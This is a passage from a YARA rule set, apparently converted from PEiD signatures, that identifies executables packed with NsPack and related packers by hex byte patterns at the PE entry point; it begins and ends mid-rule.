FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_nSPack_13_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 55 F9 FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 7D F9 FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 11 F9 FF FF 89 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 00 00 00 ?? ?? ?? ?? 
00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_nSPack_13_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping_: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V36_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V34_V35_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_urlwwwnsdsncom: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? 
FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 83 7E 08 00 75 02 EB 7A 8B 5E 08 03 DA 53 52 56 8D BD ?? ?? FF FF 03 7E 04 83 C6 0C 57 }\r\n        $b = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_Net_LiuXingPing_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x3x_NET_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_V34_V35_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? 
?? ?? ?? 80 38 01 0F 84 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v37_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_29_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? 
FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V11_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V23_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V30_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V23_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V13_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V37_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 
80 39 01 0F ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V25_V26_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_3x_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V31_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 
8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V10_V2X_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 45 78 69 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V31_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V2X_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V10_V2X_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 45 78 69 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V2x_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }\r\n        $b = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_nSPack_13_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 
0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V2x_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_nSPack_13_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V13_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? 
FF FF 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing_: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V27_V35_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 54 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V37_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? 
FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_v23_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x_North_StarLiu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_3x_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_httpwwwnsdsncom: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? 
FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V2X_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_3x_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_Liuxingping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V30_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_urlwwwnsdsncom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? 
FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V29_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 8A 06 3C 00 74 12 8B F5 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_23_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 55 F9 FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 7D F9 FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 11 F9 FF FF 89 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 